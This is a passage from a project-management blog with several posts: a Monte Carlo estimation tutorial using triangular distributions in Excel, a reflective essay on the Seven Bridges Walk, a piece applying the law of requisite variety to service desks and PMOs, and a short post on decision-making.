Where $\sum_{t}$ denotes the sum of all non-zero likelihoods – i.e. those that lie between 2 and 8 days. In simple terms this is the area enclosed by the likelihood curves and the x axis in figures 2 to 5. (Technical Note: Since $t$ is a continuous variable, this should be denoted by an integral rather than a simple sum, but this is a technicality that need not concern us here)
$P(t)$ is , in fact, what mathematicians call probability– which explains why I have used the symbol $P$ rather than $L$. Now that I’ve explained what it is, I’ll use the word “probability” instead of ” likelihood” in the remainder of this article.
With these assumptions in hand, we can now obtain numerical values for the probability of completion for all times between 2 and 8 days. This can be figured out by noting that the area under the probability curve (the triangle in figure 3 and the weird shape in figure 4) must equal 1, and we’ll do this next. Indeed, for the problem at hand, we’ll assume that all four task durations can be fitted to triangular distributions. This is primarily to keep things simple. However, I should emphasise that you can use any shape so long as you can express it mathematically, and I’ll say more about this towards the end of this article.
### The triangular distribution
Let’s look at the estimate for Task 1. We have three numbers corresponding to a minimummost likely and maximum time. To keep the discussion general, we’ll call these $t_{min}$, $t_{ml}$ and $t_{max}$ respectively, (we’ll get back to our estimator’s specific numbers later).
Now, what about the probabilities associated with each of these times?
Since $t_{min}$ and $t_{max}$ correspond to the minimum and maximum times, the probability associated with these is zero. Why? Because if it wasn’t zero, then there would be a non-zero probability of completion for a time less than $t_{min}$ or greater than $t_{max}$ – which isn’t possible [Note: this is a consequence of the assumption that the probability varies continuously – so if it takes on non-zero value, $p_{0}$, at $t_{min}$ then it must take on a value slightly less than $p_{0}$ – but greater than 0 – at $t$ slightly smaller than $t_{min}$ ] . As far as the most likely time, $t_{ml}$, is concerned: by definition, the probability attains its highest value at time $t_{ml}$. So, assuming the probability can be described by a triangular function, the distribution must have the form shown in Figure 6 below.
Figure 6: Triangular distribution redux.
For the simulation, we need to know the equation describing the above distribution. Although Wikipedia will tell us the answer in a mouse-click, it is instructive to figure it out for ourselves. First, note that the area under the triangle must be equal to 1 because the task must finish at some time between $t_{min}$ and $t_{max}$. As a consequence we have:
$\frac{1}{2}\times{base}\times{altitude}=\frac{1}{2}\times{(t_{max}-t_{min})}\times{p(t_{ml})}=1\ldots\ldots{(1)}$
where $p(t_{ml})$ is the probability corresponding to time $t_{ml}$. With a bit of rearranging we get,
$p(t_{ml})=\frac{2}{(t_{max}-t_{min})}\ldots\ldots(2)$
To derive the probability for any time $t$ lying between $t_{min}$ and $t_{ml}$, we note that:
$\frac{(t-t_{min})}{p(t)}=\frac{(t_{ml}-t_{min})}{p(t_{ml})}\ldots\ldots(3)$
This is a consequence of the fact that the ratios on either side of equation (3) are equal to the slope of the line joining the points $(t_{min},0)$ and $(t_{ml}, p(t_{ml}))$.
Figure 7
Substituting (2) in (3) and simplifying a bit, we obtain:
$p(t)=\frac{2(t-t_{min})}{(t_{ml}-t_{min})(t_{max}-t_{min})}\dots\ldots(4)$ for $t_{min}\leq t \leq t_{ml}$
In a similar fashion one can show that the probability for times lying between $t_{ml}$ and $t_{max}$ is given by:
$p(t)=\frac{2(t_{max}-t)}{(t_{max}-t_{ml})(t_{max}-t_{min})}\dots\ldots(5)$ for $t_{ml}\leq t \leq t_{max}$
Equations 4 and 5 together describe the probability distribution function (or PDF) for all times between $t_{min}$ and $t_{max}$.
As it turns out, in Monte Carlo simulations, we don’t directly work with the probability distribution function. Instead we work with the cumulative distribution function (or CDF) which is the probability, $P$, that the task is completed by time $t$. To reiterate, the PDF, $p(t)$, is the probability of the task finishing at time $t$ whereas the CDF, $P(t)$, is the probability of the task completing by time $t$. The CDF, $P(t)$, is essentially a sum of all probabilities between $t_{min}$ and $t$. For $t < t_{min}$ this is the area under the triangle with apexes at ($t_{min}$, 0), (t, 0) and (t, p(t)). Using the formula for the area of a triangle (1/2 base times height) and equation (4) we get:
$P(t)=\frac{(t-t_{min})^2}{(t_{ml}-t_{min})(t_{max}-t_{min})}\ldots\ldots(6)$ for $t_{min}\leq t \leq t_{ml}$
Noting that for $t \geq t_{ml}$, the area under the curve equals the total area minus the area enclosed by the triangle with base between t and $t_{max}$, we have:
$P(t)=1- \frac{(t_{max}-t)^2}{(t_{max}-t_{ml})(t_{max}-t_{min})}\ldots\ldots(7)$ for $t_{ml}\leq t \leq t_{max}$
As expected, $P(t)$ starts out with a value 0 at $t_{min}$ and then increases monotonically, attaining a value of 1 at $t_{max}$.
To end this section let’s plug in the numbers quoted by our estimator at the start of this section: $t_{min}=2$, $t_{ml}=4$ and $t_{max}=8$. The resulting PDF and CDF are shown in figures 8 and 9.
Figure 8: PDF for triangular distribution (tmin=2, tml=4, tmax=8)
Figure 9 – CDF for triangular distribution (tmin=2, tml=4, tmax=8)
### Monte Carlo in a minute
Now with all that conceptual work done, we can get to the main topic of this post: Monte Carlo estimation. The basic idea behind Monte Carlo is to simulate the entire project (all 4 tasks in this case) a large number N (say 10,000) times and thus obtain N overall completion times. In each of the N trials, we simulate each of the tasks in the project and add them up appropriately to give us an overall project completion time for the trial. The resulting N overall completion times will all be different, ranging from the sum of the minimum completion times to the sum of the maximum completion times. In other words, we will obtain the PDF and CDF for the overall completion time, which will enable us to answer questions such as:
• How likely is it that the project will be completed within 17 days?
• What’s the estimated time for which I can be 90% certain that the project will be completed? For brevity, I’ll call this the 90% completion time in the rest of this piece.
“OK, that sounds great”, you say, “but how exactly do we simulate a single task”?
Good question, and I was just about to get to that…
### Simulating a single task using the CDF
As we saw earlier, the CDF for the triangular has a S shape and ranges from 0 to 1 in value. It turns out that the S shape is characteristic of all CDFs, regardless of the details underlying PDF. Why? Because, the cumulative probability must lie between 0 and 1 (remember, probabilities can never exceed 1, nor can they be negative).
OK, so to simulate a task, we:
• generate a random number between 0 and 1, this corresponds to the probability that the task will finish at time t.
• find the time, t, that this corresponds to this value of probability. This is the completion time for the task for this trial.
Incidentally, this method is called inverse transform sampling.
An example might help clarify how inverse transform sampling works. Assume that the random number generated is 0.4905. From the CDF for the first task, we see that this value of probability corresponds to a completion time of 4.503 days, which is the completion for this trial (see Figure 10). Simple!
Figure 10: Illustrating inverse transform sampling
In this case we found the time directly from the computed CDF. That’s not too convenient when you’re simulating the project 10,000 times. Instead, we need a programmable math expression that gives us the time corresponding to the probability directly. This can be obtained by solving equations (6) and (7) for $t$. Some straightforward algebra, yields the following two expressions for $t$:
$t = t_{min} + \sqrt{P(t)(t_{ml} - t_{min})(t_{max} - t_{min})} \ldots\ldots(8)$ for $t_{min}\leq t \leq t_{ml}$
And
$t = t_{max} - \sqrt{[1-P(t)](t_{max} - t_{ml})(t_{max} - t_{min})} \ldots\ldots(9)$ for $t_{ml}\leq t \leq t_{max}$
These can be easily combined in a single Excel formula using an IF function, and I’ll show you exactly how in a minute. Yes, we can now finally get down to the Excel simulation proper and you may want to download the workbook if you haven’t done so already.
### The simulation
Open up the workbook and focus on the first three columns of the first sheet to begin with. These simulate the first task in Figure 1, which also happens to be the task we have used to illustrate the construction of the triangular distribution as well as the mechanics of Monte Carlo.
Rows 2 to 4 in columns A and B list the min, most likely and max completion times while the same rows in column C list the probabilities associated with each of the times. For $t_{min}$ the probability is 0 and for $t_{max}$ it is 1. The probability at $t_{ml}$ can be calculated using equation (6) which, for $t=t_{max}$, reduces to
$P(t_{ml}) =\frac{(t_{ml}-t_{min})}{t_{max}-t_{min}}\ldots\ldots(10)$
Rows 6 through 10005 in column A are simulated probabilities of completion for Task 1. These are obtained via the Excel RAND() function, which generates uniformly distributed random numbers lying between 0 and 1. This gives us a list of probabilities corresponding to 10,000 independent simulations of Task 1.
The 10,000 probabilities need to be translated into completion times for the task. This is done using equations (8) or (9) depending on whether the simulated probability is less or greater than $P(t_{ml})$, which is in cell C3 (and given by Equation (10) above). The conditional statement can be coded in an Excel formula using the IF() function.
Tasks 2-4 are coded in exactly the same way, with distribution parameters in rows 2 through 4 and simulation details in rows 6 through 10005 in the columns listed below:
• Task 2 – probabilities in column D; times in column F
• Task 3 – probabilities in column H; times in column I
• Task 4 – probabilities in column K; times in column L
That’s basically it for the simulation of individual tasks. Now let’s see how to combine them.
For tasks in series (Tasks 1 and 2), we simply sum the completion times for each task to get the overall completion times for the two tasks. This is what’s shown in rows 6 through 10005 of column G.
For tasks in parallel (Tasks 3 and 4), the overall completion time is the maximum of the completion times for the two tasks. This is computed and stored in rows 6 through 10005 of column N.
Finally, the overall project completion time for each simulation is then simply the sum of columns G and N (shown in column O)
Sheets 2 and 3 are plots of the probability and cumulative probability distributions for overall project completion times. I’ll cover these in the next section.
### Discussion – probabilities and estimates
The figure on Sheet 2 of the Excel workbook (reproduced in Figure 11 below) is the probability distribution function (PDF) of completion times. The x-axis shows the elapsed time in days and the y-axis the number of Monte Carlo trials that have a completion time that lie in the relevant time bin (of width 0.5 days). As an example, for the simulation shown in the Figure 11, there were 882 trials (out of 10,000) that had a completion time that lie between 16.25 and 16.75 days. Your numbers will vary, of course, but you should have a maximum in the 16 to 17 day range and a trial number that is reasonably close to the one I got.
Figure 11: Probability distribution of completion times (N=10,000)
I’ll say a bit more about Figure 11 in the next section. For now, let’s move on to Sheet 3 of workbook which shows the cumulative probability of completion by a particular day (Figure 12 below). The figure shows the cumulative probability function (CDF), which is the sum of all completion times from the earliest possible completion day to the particular day.
Figure 12: Probability of completion by a particular day (N=10,000)
To reiterate a point made earlier, the reason we work with the CDF rather than the PDF is that we are interested in knowing the probability of completion by a particular date (e.g. it is 90% likely that we will finish by April 20th) rather than the probability of completion on a particular date (e.g. there’s a 10% chance we’ll finish on April 17th). We can now answer the two questions we posed earlier. As a reminder, they are:
• How likely is it that the project will be completed within 17 days?
• What’s the 90% likely completion time?
Both questions are easily answered by using the cumulative distribution chart on Sheet 3 (or Fig 12). Reading the relevant numbers from the chart, I see that:
• There’s a 60% chance that the project will be completed in 17 days.
• The 90% likely completion time is 19.5 days.
How does the latter compare to the sum of the 90% likely completion times for the individual tasks? The 90% likely completion time for a given task can be calculated by solving Equation 9 for $t$, with appropriate values for the parameters $t_{min}$, $t_{max}$ and $t_{ml}$ plugged in, and $P(t)$ set to 0.9. This gives the following values for the 90% likely completion times:
• Task 1 – 6.5 days
• Task 2 – 8.1 days
• Task 3 – 7.7 days
• Task 4 – 5.8 days
Summing up the first three tasks (remember, Tasks 3 and 4 are in parallel) we get a total of 22.3 days, which is clearly an overestimation. Now, with the benefit of having gone through the simulation, it is easy to see that the sum of 90% likely completion times for individual tasks does not equal the 90% likely completion time for the sum of the relevant individual tasks – the first three tasks in this particular case. Why? Essentially because a Monte Carlo run in which the first three tasks tasks take as long as their (individual) 90% likely completion times is highly unlikely. Exercise: use the worksheet to estimate how likely this is.
There’s much more that can be learnt from the CDF. For example, it also tells us that the greatest uncertainty in the estimate is in the 5 day period from ~14 to 19 days because that’s the region in which the probability changes most rapidly as a function of elapsed time. Of course, the exact numbers are dependent on the assumed form of the distribution. I’ll say more about this in the final section.
To close this section, I’d like to reprise a point I mentioned earlier: that uncertainty is a shape, not a number. Monte Carlo simulations make the uncertainty in estimates explicit and can help you frame your estimates in the language of probability…and using a tool like Excel can help you explain these to non-technical people like your manager.
### Closing remarks
We’ve covered a fair bit of ground: starting from general observations about how long a task takes, saw how to construct simple probability distributions and then combine these using Monte Carlo simulation. Before I close, there are a few general points I should mention for completeness…and as warning.
First up, it should be clear that the estimates one obtains from a simulation depend critically on the form and parameters of the distribution used. The parameters are essentially an empirical matter; they should be determined using historical data. The form of the function, is another matter altogether: as pointed out in an earlier section, one cannot determine the shape of a function from a finite number of data points. Instead, one has to focus on the properties that are important. For example, is there a small but finite chance that a task can take an unreasonably long time? If so, you may want to use a lognormal distribution…but remember, you will need to find a sensible way to estimate the distribution parameters from your historical data.
Second, you may have noted from the probability distribution curve (Figure 11) that despite the skewed distributions of the individual tasks, the distribution of the overall completion time is somewhat symmetric with a minimum of ~9 days, most likely time of ~16 days and maximum of 24 days. It turns out that this is a general property of distributions that are generated by adding a large number of independent probabilistic variables. As the number of variables increases, the overall distribution will tend to the ubiquitous Normal distribution.
The assumption of independence merits a closer look. In the case it hand, it implies that the completion times for each task are independent of each other. As most project managers will know from experience, this is rarely the case: in real life, a task that is delayed will usually have knock-on effects on subsequent tasks. One can easily incorporate such dependencies in a Monte Carlo simulation. A formal way to do this is to introduce a non-zero correlation coefficient between tasks as I have done here. A simpler and more realistic approach is to introduce conditional inter-task dependencies As an example, one could have an inter-task delay that kicks in only if the predecessor task takes more than 80% of its maximum time.
Thirdly, you may have wondered why I used 10,000 trials: why not 100, or 1000 or 20,000. This has to do with the tricky issue of convergence. In a nutshell, the estimates we obtain should not depend on the number of trials used. Why? Because if they did, they’d be meaningless.
Operationally, convergence means that any predicted quantity based on aggregates should not vary with number of trials. So, if our Monte Carlo simulation has converged, our prediction of 19.5 days for the 90% likely completion time should not change substantially if I increase the number of trials from ten to twenty thousand. I did this and obtained almost the same value of 19.5 days. The average and median completion times (shown in cell Q3 and Q4 of Sheet 1) also remained much the same (16.8 days). If you wish to repeat the calculation, be sure to change the formulas on all three sheets appropriately. I was lazy and hardcoded the number of trials. Sorry!
Finally, I should mention that simulations can be usefully performed at a higher level than individual tasks. In their highly-readable book, Waltzing With Bears: Managing Risk on Software Projects, Tom De Marco and Timothy Lister show how Monte Carlo methods can be used for variables such as velocity, time, cost etc. at the project level as opposed to the task level. I believe it is better to perform simulations at the lowest possible level, the main reason being that it is easier, and less error-prone, to estimate individual tasks than entire projects. Nevertheless, high level simulations can be very useful if one has reliable data to base these on.
There are a few more things I could say about the usefulness of the generated distribution functions and Monte Carlo in general, but they are best relegated to a future article. This one is much too long already and I think I’ve tested your patience enough. Thanks so much for reading, I really do appreciate it and hope that you found it useful.
Acknowledgement: My thanks to Peter Holberton for pointing out a few typographical and coding errors in an earlier version of this article. These have now been fixed. I’d be grateful if readers could bring any errors they find to my attention.
Written by K
March 27, 2018 at 4:11 pm
Tagged with
## The map and the territory – a project manager’s reflections on the Seven Bridges Walk
Korzybski’s aphorism about the gap between the map and the territory tells a truth that is best understood by walking the territory.
### The map
Some weeks ago my friend John and I did the Seven Bridges Walk, a 28 km affair organised annually by the NSW Cancer Council. The route loops around a section of the Sydney shoreline, taking in north shore and city vistas, traversing seven bridges along the way. I’d been thinking about doing the walk for some years but couldn’t find anyone interested enough to commit a Sunday. A serendipitous conversation with John a few months ago changed that.
John and I are both in reasonable shape as we are keen bushwalkers. However, the ones we do are typically in the 10 – 15 km range. Seven Bridges, being about double that, presented a higher order challenge. The best way to allay our concerns was to plan. We duly got hold of a map and worked out a schedule based on an average pace of 5 km per hour (including breaks), a figure that seemed reasonable at the time (Figure 1 – click on images to see full sized versions).
Figure 1:The map, the plan
Some key points:
1. We planned to start around 7:45 am at Hunters Hill Village and have our first break at Lane Cove Village, around the 5 to 6 km from the starting point. Our estimated time for this section was about an hour.
2. The plan was to take the longer, more interesting route (marked in green). This covered bushland and parks rather than roads. The detours begin at sections of the walk marked as “Decision Points” in the map, and add at a couple of kilometers to the walk, making it a round 30 km overall.
3. If needed, we would stop at the 9 or 11 km mark (Wollstonecraft or Milson’s Point) for another break before heading on towards the city.
4. We figured it would take us 4 to 5 hours (including breaks) to do the 18 km from Hunters Hill to Pyrmont Village in the heart of the city, so lunch would be between noon and 1 pm.
5. The backend of the walk, the ~ 10 km from Pyrmont to Hunters Hill, would be covered at an easier pace in the afternoon. We thought this section would take us 2.5 to 3 hours giving us a finish time of around 4 pm.
A planned finish time of 4 pm meant we had enough extra time in hand if we needed it. We were very comfortable with what we’d charted out on the map.
### The territory
We started on time and made our first crossing at around 8am: Fig Tree Bridge, about a kilometer from the starting point. John took this beautiful shot from one end, the yellow paintwork and purple Jacaranda set against the diffuse light off the Lane Cove River.
Figure 2: Lane Cove River from Fig Tree Bridge
Looking city-wards from the middle of the bridge, I got this one of a couple of morning kayakers.
Figure 3: Morning kayakers on the river
Scenes such as these convey a sense of what it was like to experience the territory, something a map cannot do. The gap between the map and the territory is akin to the one between a plan and a project; the lived experience of a project is very different from the plan, and is also unique to each individual. Jon Whitty and Bronte van der Hoorn explore this at length in a fascinating paper that relates the experience of managing a project to the philosophy of Martin Heidegger.
The route then took us through a number of steep (but mercifully short) sections in the Lane Cove and Wollstonecraft area. On researching these later, I was gratified to find that three are featured in the Top 10 Hill runs in Lane Cove. Here’s a Google Street View shot of the top ranked one. Though it doesn’t look like much, it’s not the kind of gradient you want to encounter in a long walk.
Figure 4: A bit of a climb
As we negotiated these sections, it occurred to me that part of the fun lay in not knowing they were coming up. It’s often better not to anticipate challenges that are an unavoidable feature of the territory and deal with them as they arise. Just to be clear, I’m talking about routine challenges that are part of the territory, not those that are avoidable or have the potential to derail a project altogether.
It was getting to be time for that planned first coffee break. When drawing up our plan, we had assumed that all seven starting points (marked in blue in the map in Figure 1) would have cafes. Bad assumption: the starting points were set off from the main commercial areas. In retrospect, this makes good sense: you don’t want to have thousands of walkers traipsing through a small commercial area, disturbing the peace of locals enjoying a Sunday morning coffee. Whatever the reason, the point is that a taken-for-granted assumption turned out to be wrong; we finally got our first coffee well past the 10 km mark.
Post coffee, as we continued city-wards through Lavender Street we got this unexpected view:
Figure 5: Harbour Bridge from Lavender St.
The view was all the sweeter because we realised we were close to the Harbour, well ahead of schedule (it was a little after 10 am).
The Harbour Bridge is arguably the most recognisable Sydney landmark. So instead of yet another stereotypical shot of it, I took one that shows a walker’s perspective while crossing it:
Figure 6: A pedestrian’s view of The Bridge
The barbed wire and mesh fencing detract from what would be an absolutely breathtaking view. According to this report, the fence has been in place for safety reasons since 1934! And yes, as one might expect, it is a sore point with tourists who come from far and wide to see the bridge.
Descriptions of things – which are but maps of a kind – often omit details that are significant. Sometimes this is done to downplay negative aspects of the object or event in question. How often have you, as a project manager, “dressed-up” reports to your stakeholders? Not outright lies, but stretching the truth. I’ve done it often enough.
The section south of The Bridge took us through parks surrounding the newly developed Barangaroo precinct which hugs the northern shoreline of the Sydney central business district. Another kilometer, and we were at crossing # 3, the Pyrmont Bridge in Darling Harbour:
Figure 7: Pyrmont Bridge
Though almost an hour and half ahead of schedule, we took a short break for lunch at Darling Harbour before pressing on to Balmain and Anzac Bridge. John took this shot looking upward from Anzac Bridge:
Figure: View looking up from Anzac Bridge
Commissioned in 1995, it replaced the Glebe Island Bridge, an electrically operated swing bridge constructed in 1903, which remained the main route from the city out to the western suburbs for over 90 years! As one might imagine, as the number of vehicles in the city increased many-fold from the 60s onwards, the old bridge became a major point of congestion. The Glebe Island Bridge, now retired, is a listed heritage site.
Incidentally, this little nugget of history was related to me by John as we walked this section of the route. It’s something I would almost certainly have missed had he not been with me that day. Journeys, real and metaphoric, are often enriched by travelling companions who point out things or fill in context that would otherwise be passed over.
Once past Anzac Bridge, the route took us off the main thoroughfare through the side streets of Rozelle. Many of these are lined by heritage buildings. Rozelle is in the throes of change as it is going to be impacted by a major motorway project.
The project reflects a wider problem in Australia: the relative neglect of public transport compared to road infrastructure. The counter-argument is that the relatively small population of the country makes the capital investments and running costs of public transport prohibitive. A wicked problem with no easy answers, but I do believe that the more sustainable option, though more expensive initially, will prove to be the better one in the long run.
Wicked problems are expected in large infrastructure projects that affect thousands of stakeholders, many of whom will have diametrically opposing views. What is less well appreciated is that even much smaller projects – say IT initiatives within a large organisation – can have elements of wickedness that can trip up the unwary. This is often magnified by management decisions made on the basis of short-term expediency.
From the side streets of Rozelle, the walk took us through Callan Park, which was the site of a psychiatric hospital from 1878 to 1994 (see this article for a horrifying history of asylums in Sydney). Some of the asylum buildings are now part of the Sydney College of The Arts. Pending the establishment of a trust to manage ongoing use of the site, the park is currently managed by the NSW Government in consultation with the local municipality.
Our fifth crossing of the day was Iron Cove Bridge. The cursory shot I took while crossing it does not do justice to the view; the early afternoon sun was starting to take its toll.
Figure 9: View from Iron Cove Bridge
The route then took us about a kilometer and half through the backstreets of Drummoyne to the penultimate crossing: Gladesville Bridge whose claim to fame is that it was for many years the longest single span concrete arch bridge in the world (another historical vignette that came to me via John). It has since been superseded by the Qinglong Railway Bridge in China.
By this time I was feeling quite perky, cheered perhaps by the realisation that we were almost done. I took time to compose perhaps my best shot of the day as we crossed Gladesville Bridge.
Figure 10: View from Gladesville Bridge
…and here’s one of the aforementioned arch, taken from below the bridge:
Figure 11: A side view of Gladesville Bridge
The final crossing, Tarban Creek Bridge was a short 100 metre walk from the Gladesville Bridge. We lingered mid-bridge to take a few shots as we realised the walk was coming to an end; the finish point was a few hundred metres away.
Figure 12: View from Tarban Creek Bridge
We duly collected our “Seven Bridges Completed” stamp at around 2:30 pm and headed to the local pub for a celebratory pint.
Figure 13: A well-deserved pint
### Wrapping up
Gregory Bateson once wrote:
“We say the map is different from the territory. But what is the territory? Operationally, somebody went out with a retina or a measuring stick and made representations which were then put upon paper. What is on the paper map is a representation of what was in the retinal representation of the [person] who made the map; and as you push the question back, what you find is an infinite regress, an infinite series of maps. The territory never gets in at all. The territory is [the thing in itself] and you can’t do anything with it. Always the process of representation will filter it out so that the mental world is only maps of maps of maps, ad infinitum.”
One might think that a solution lies in making ever more accurate representations, but that is an exercise in futility. Indeed, as Borges pointed out in a short story:
“… In that Empire, the Art of Cartography attained such Perfection that the map of a single Province occupied the entirety of a City, and the map of the Empire, the entirety of a Province. In time, those Unconscionable Maps no longer satisfied, and the Cartographers Guilds struck a Map of the Empire whose size was that of the Empire, and which coincided point for point with it. The following Generations, who were not so fond of the Study of Cartography as their Forebears had been, saw that that vast map was Useless…”
Apart from being impossibly cumbersome, a complete map of a territory is impossible because a representation can never be the real thing. The territory remains forever ineffable; every encounter with it is unique and has the potential to reveal new perspectives.
This is as true for a project as it is for a walk or any other experience.
Written by K
November 27, 2017 at 1:33 pm
Posted in Project Management
## The law of requisite variety and its implications for enterprise IT
### Introduction
There are two facets to the operation of IT systems and processes in organisations: governance, the standards and regulations associated with a system or process; and execution, which relates to steering the actual work of the system or process in specific situations.
An example might help clarify the difference:
The purpose of project management is to keep projects on track. There are two aspects to this: one pertaining to the project management office (PMO) which is responsible for standards and regulations associated with managing projects in general, and the other relating to the day-to-day work of steering a particular project. The two sometimes work at cross-purposes. For example, successful project managers know that much of their work is about navigate their projects through the potentially treacherous terrain of their organisations, an activity that sometimes necessitates working around, or even breaking, rules set by the PMO.
Governance and steering share a common etymological root: the word kybernetes, which means steersman in Greek. It also happens to be the root word of Cybernetics which is the science of regulation or control. In this post, I apply a key principle of cybernetics to a couple of areas of enterprise IT.
### Cybernetic systems
An oft quoted example of a cybernetic system is a thermostat, a device that regulates temperature based on inputs from the environment. Most cybernetic systems are way more complicated than a thermostat. Indeed, some argue that the Earth is a huge cybernetic system. A smaller scale example is a system consisting of a car + driver wherein a driver responds to changes in the environment thereby controlling the motion of the car.
Cybernetic systems vary widely not just in size, but also in complexity. A thermostat is concerned only the ambient temperature whereas the driver in a car has to worry about a lot more (e.g. the weather, traffic, the condition of the road, kids squabbling in the back-seat etc.). In general, the more complex the system and its processes, the larger the number of variables that are associated with it. Put another way, complex systems must be able to deal with a greater variety of disturbances than simple systems.
### The law of requisite variety
It turns out there is a fundamental principle – the law of requisite variety– that governs the capacity of a system to respond to changes in its environment. The law is a quantitative statement about the different types of responses that a system needs to have in order to deal with the range of disturbances it might experience.
According to this paper, the law of requisite variety asserts that:
The larger the variety of actions available to a control system, the larger the variety of perturbations it is able to compensate.
Mathematically:
V(E) > V(D) – V(R) – K
Where V represents variety, E represents the essential variable(s) to be controlled, D represents the disturbance, R the regulation and K the passive capacity of the system to absorb shocks. The terms are explained in brief below:
V(E) represents the set of desired outcomes for the controlled environmental variable: desired temperature range in the case of the thermostat, successful outcomes (i.e. projects delivered on time and within budget) in the case of a project management office.
V(D) represents the variety of disturbances the system can be subjected to (the ways in which the temperature can change, the external and internal forces on a project)
V(R) represents the various ways in which a disturbance can be regulated (the regulator in a thermostat, the project tracking and corrective mechanisms prescribed by the PMO)
K represents the buffering capacity of the system – i.e. stored capacity to deal with unexpected disturbances.
I won’t say any more about the law of requisite variety as it would take me to far afield; the interested and technically minded reader is referred to the link above or this paper for more.
### Implications for enterprise IT
In plain English, the law of requisite variety states that only “variety can absorb variety.” As stated by Anthony Hodgson in an essay in this book, the law of requisite variety:
…leads to the somewhat counterintuitive observation that the regulator must have a sufficiently large variety of actions in order to ensure a sufficiently small variety of outcomes in the essential variables E. This principle has important implications for practical situations: since the variety of perturbations a system can potentially be confronted with is unlimited, we should always try maximize its internal variety (or diversity), so as to be optimally prepared for any foreseeable or unforeseeable contingency.
This is entirely consistent with our intuitive expectation that the best way to deal with the unexpected is to have a range of tools and approaches at ones disposal.
In the remainder of this piece, I’ll focus on the implications of the law for an issue that is high on the list of many corporate IT departments: the standardization of IT systems and/or processes.
The main rationale behind standardizing an IT process is to handle all possible demands (or use cases) via a small number of predefined responses. When put this way, the connection to the law of requisite variety is clear: a request made upon a function such as a service desk or project management office (PMO) is a disturbance and the way they regulate or respond to it determines the outcome.
### Requisite variety and the service desk
A service desk is a good example of a system that can be standardized. Although users may initially complain about having to log a ticket instead of calling Nathan directly, in time they get used to it, and may even start to see the benefits…particularly when Nathan goes on vacation.
The law of requisite variety tells us successful standardization requires that all possible demands made on the system be known and regulated by the V(R) term in the equation above. In case of a service desk this is dealt with by a hierarchy of support levels. 1st level support deals with routine calls (incidents and service requests in ITIL terminology) such as system access and simple troubleshooting. Calls that cannot be handled by this tier are escalated to the 2nd and 3rd levels as needed. The assumption here is that, between them, the three support tiers should be able to handle majority of calls.
Slack (the K term) relates to unexploited capacity. Although needed in order to deal with unexpected surges in demand, slack is expensive to carry when one doesn’t need it. Given this, it makes sense to incorporate such scenarios into the repertoire of the standard system responses (i.e the V(R) term) whenever possible. One way to do this is to anticipate surges in demand and hire temporary staff to handle them. Another way is to deal with infrequent scenarios outside the system- i.e. deem them out of scope for the service desk.
Service desk standardization is thus relatively straightforward to achieve provided:
• The kinds of calls that come in are largely predictable.
• The work can be routinized.
• All non-routine work – such as an application enhancement request or a demand for a new system- is dealt with outside the system via (say) a change management process.
All this will be quite unsurprising and obvious to folks working in corporate IT. Now let’s see what happens when we apply the law to a more complex system.
### Requisite variety and the PMO
Many corporate IT leaders see the establishment of a PMO as a way to control costs and increase efficiency of project planning and execution. PMOs attempt to do this by putting in place governance mechanisms. The underlying cause-effect assumption is that if appropriate rules and regulations are put in place, project execution will necessarily improve. Although this sounds reasonable, it often does not work in practice: according to this article, a significant fraction of PMOs fail to deliver on the promise of improved project performance. Consider the following points quoted directly from the article:
• “50% of project management offices close within 3 years (Association for Project Mgmt)”
• “Since 2008, the correlated PMO implementation failure rate is over 50% (Gartner Project Manager 2014)”
• “Only a third of all projects were successfully completed on time and on budget over the past year (Standish Group’s CHAOS report)”
• “68% of stakeholders perceive their PMOs to be bureaucratic (2013 Gartner PPM Summit)”
• “Only 40% of projects met schedule, budget and quality goals (IBM Change Management Survey of 1500 execs)”
The article goes on to point out that the main reason for the statistics above is that there is a gap between what a PMO does and what the business expects it to do. For example, according to the Gartner review quoted in the article over 60% of the stakeholders surveyed believe their PMOs are overly bureaucratic. I can’t vouch for the veracity of the numbers here as I cannot find the original paper. Nevertheless, anecdotal evidence (via various articles and informal conversations) suggests that a significant number of PMOs fail.
There is a curious contradiction between the case of the service desk and that of the PMO. In the former, process and methodology seem to work whereas in the latter they don’t.
Why?
The answer, as you might suspect, has to do with variety. Projects and service requests are very different beasts. Among other things, they differ in:
• Duration: A project typically goes over many months whereas a service request has a lifetime of days,
• Technical complexity: A project involves many (initially ill-defined) technical tasks that have to be coordinated and whose outputs have to be integrated. A service request typically consists one (or a small number) of well-defined tasks.
• Social complexity: A project involves many stakeholder groups, with diverse interests and opinions. A service request typically involves considerably fewer stakeholders, with limited conflicts of opinions/interests.
It is not hard to see that these differences increase variety in projects compared to service requests. The reason that standardization (usually) works for service desks but (often) fails for PMOs is that the PMOs are subjected a greater variety of disturbances than service desks.
The key point is that the increased variety in the case of the PMO precludes standardisation. As the law of requisite variety tells us, there are two ways to deal with variety: regulate it or adapt to it. Most PMOs take the regulation route, leading to over-regulation and outcomes that are less than satisfactory. This is exactly what is reflected in the complaint about PMOs being overly bureaucratic. The solution simple and obvious solution is for PMOs to be more flexible– specifically, they must be able to adapt to the ever changing demands made upon them by their organisations’ projects. In terms of the law of requisite variety, PMOs need to have the capacity to change the system response, V(R), on the fly. In practice this means recognising the uniqueness of requests by avoiding reflex, cookie cutter responses that characterise bureaucratic PMOs.
### Wrapping up
The law of requisite variety is a general principle that applies to any regulated system. In this post I applied the law to two areas of enterprise IT – service management and project governance – and discussed why standardization works well for the former but less satisfactorily for the latter. Indeed, in view of the considerable differences in the duration and complexity of service requests and projects, it is unreasonable to expect that standardization will work well for both. The key takeaway from this piece is therefore a simple one: those who design IT functions should pay attention to the variety that the functions will have to cope with, and bear in mind that standardization works well only if variety is known and limited.
Written by K
December 12, 2016 at 9:00 pm
## Improving decision-making in projects
An irony of organisational life is that the most important decisions on projects (or any other initiatives) have to be made at the start, when ambiguity is at its highest and information availability lowest. I recently gave a talk at the Pune office of BMC Software on improving decision-making in such situations.
The talk was recorded and simulcast to a couple of locations in India. The folks at BMC very kindly sent me a copy of the recording with permission to publish it on Eight to Late. Here it is:
Based on the questions asked and the feedback received, I reckon that a number of people found the talk useful. I’d welcome your comments/feedback.
Acknowledgements: My thanks go out to Gaurav Pal, Manish Gadgil and Mrinalini Wankhede for giving me the opportunity to speak at BMC, and to Shubhangi Apte for putting me in touch with them. Finally, I’d like to thank the wonderful audience at BMC for their insightful questions and comments.
Written by K
January 19, 2016 at 5:28 pm
## The Risk – a dialogue mapping vignette
with one comment
### Foreword
